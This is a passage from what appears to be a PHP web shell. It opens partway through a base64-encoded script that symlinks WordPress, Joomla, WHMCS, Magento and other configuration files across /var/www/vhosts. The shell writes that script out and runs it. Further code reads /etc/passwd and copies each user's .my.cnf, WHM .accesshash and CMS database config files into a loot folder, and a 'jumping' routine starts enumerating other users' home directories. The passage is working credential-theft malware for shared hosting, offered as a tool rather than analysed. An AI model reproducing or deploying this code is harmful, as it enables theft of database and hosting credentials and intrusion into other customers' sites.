N5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ldy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLW5ldy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9nL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmxvZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLWJsb2dzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy1ob21lLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Byb3RhbC93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3Mtc2l0ZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy90ZXN0L3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MtdGVzdC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJjYWRlL2Z1bmN0aW9ucy9kYmNsYXNzLnBocCcsJHNpdGVzcy4nLWlicHJvYXJjYWRlLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvb21sYS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
702.         $file = "botline_config/vhost.cin";
703.         $handle = fopen($file ,"w+");
704.         fwrite($handle ,base64_decode($vhost));
705.         fclose($handle);
706.         chmod($file, 0755);
707.         if(exe("cd botline_config && ./vhost.cin")) {
708.             echo "<center><a href='$link_config/botline_config'><font color=green>Done</font></a></center>";
709.         } else {
710.             echo "<center><a href='$link_config/botline_config/vhost.cin'><font color=green>Done</font></a></center>";
711.         }
712.  
713.     } else {
714.         $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
715.         while($passwd = fgets($etc)) {
716.             if($passwd == "" || !$etc) {
717.                 echo "<font color=red>Can't read /etc/passwd</font>";
718.             } else {
719.                 preg_match_all('/(.*?):x:/', $passwd, $user_config);
720.                 foreach($user_config[1] as $user_idx) {
721.                     $user_config_dir = "/home/$user_idx/public_html/";
722.                     if(is_readable($user_config_dir)) {
723.                         $grab_config = array(
724.                             "/home/$user_idx/.my.cnf" => "cpanel",
725.                             "/home/$user_idx/.accesshash" => "WHM-accesshash",
726.                             "$user_config_dir/po-content/config.php" => "Popoji",
727.                             "$user_config_dir/vdo_config.php" => "Voodoo",
728.                             "$user_config_dir/koneksi.php" => "web-default",
729.                             "$user_config_dir/bw-configs/config.ini" => "BosWeb",
730.                             "$user_config_dir/config/koneksi.php" => "Lokomedia",
731.                             "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
732.                             "$user_config_dir/clientarea/configuration.php" => "WHMCS",
733.                             "$user_config_dir/whm/configuration.php" => "WHMCS",
734.                             "$user_config_dir/whmcs/configuration.php" => "WHMCS",
735.                             "$user_config_dir/forum/config.php" => "phpBB",
736.                             "$user_config_dir/sites/default/settings.php" => "Drupal",
737.                             "$user_config_dir/config/settings.inc.php" => "PrestaShop",
738.                             "$user_config_dir/app/etc/local.xml" => "Magento",
739.                             "$user_config_dir/joomla/configuration.php" => "Joomla",
740.                             "$user_config_dir/configuration.php" => "Joomla",
741.                             "$user_config_dir/wp/wp-config.php" => "WordPress",
742.                             "$user_config_dir/wordpress/wp-config.php" => "WordPress",
743.                             "$user_config_dir/wp-config.php" => "WordPress",
744.                             "$user_config_dir/admin/config.php" => "OpenCart",
745.                             "$user_config_dir/slconfig.php" => "Sitelok",
746.                             "$user_config_dir/application/config/database.php" => "Ellislab");
747.                         foreach($grab_config as $config => $nama_config) {
748.                             $ambil_config = file_get_contents($config);
749.                             if($ambil_config == '') {
750.                             } else {
751.                                 $file_config = fopen("botline_config/$user_idx-$nama_config.txt","w");
752.                                 fputs($file_config,$ambil_config);
753.                             }
754.                         }
755.                     }      
756.                 }
757.             }  
758.         }
759.     echo "<center><a href='?dir=$dir/botline_config'><font color=green>Done</font></a></center>";
760.     }
761. } elseif($_GET['do'] == 'jumping') {
762.     $i = 0;
763.     echo "<div class='margin: 5px auto;'>";
764.     if(preg_match("/hsphere/", $dir)) {
765.         $urls = explode("\r\n", $_POST['url']);
766.         if(isset($_POST['jump'])) {
767.             echo "<pre>";
768.             foreach($urls as $url) {
769.                 $url = str_replace(array("http://","www."), "", strtolower($url));
770.                 $etc = "/etc/passwd";
771.                 $f = fopen($etc,"r");
772.                 while($gets = fgets($f)) {
773.                     $pecah = explode(":", $gets);
774.                     $user = $pecah[0];
775.                     $dir_user = "/hsphere/local/home/$user";
776.                     if(is_dir($dir_user) === true) {
777.                         $url_user = $dir_user."/".$url;
778.                         if(is_readable($url_user)) {
779.                             $i++;
